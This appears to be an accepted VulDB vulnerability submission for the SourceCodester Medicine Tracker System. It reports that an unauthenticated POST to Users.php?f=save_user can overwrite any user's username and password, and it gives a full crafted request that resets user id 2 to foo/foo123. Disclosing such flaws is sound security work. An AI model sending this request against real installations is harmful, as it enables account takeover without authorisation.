| Title | Medicine Tracker System Improper Access Control |
|---|
| Description | An Improper Access Control has beed discovered in Medicine Tracker System. A remote and unauthenticated attacker can exploit this vulnerability by sending a crafted request, successful exploitation could allow attakers to change any users username and password.
The vulneravle URI is POST /php-mts/classes/Users.php?f=save_user. When the value of ' name="id" ' is correct, then an attacker could change the related username ,password and other informations. Cookie is not necessary for this operation, which means attackers could exploit it without authentication.
An malicous request is below
POST /php-mts/classes/Users.php?f=save_user HTTP/1.1
**********************************************************
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="id"
2
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="firstname"
a
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="middlename"
b
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="lastname"
c
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="username"
foo
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="password"
foo123
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z--
Then the relevant user with id=2 will be set as foo/foo123 |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/16308/medicine-tracker-system-php-oop-and-mysql-db-source-code-free-download.html |
|---|
| User | WWesleywww (UID 43117) |
|---|
| Submission | 03/17/2023 09:18 (3 years ago) |
|---|
| Moderation | 03/17/2023 12:19 (3 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 223311 [SourceCodester Medicine Tracker System 1.0 Users.php?f=save_user firstname/middlename/lastname/username/password improper authentication] |
|---|
| Points | 20 |
|---|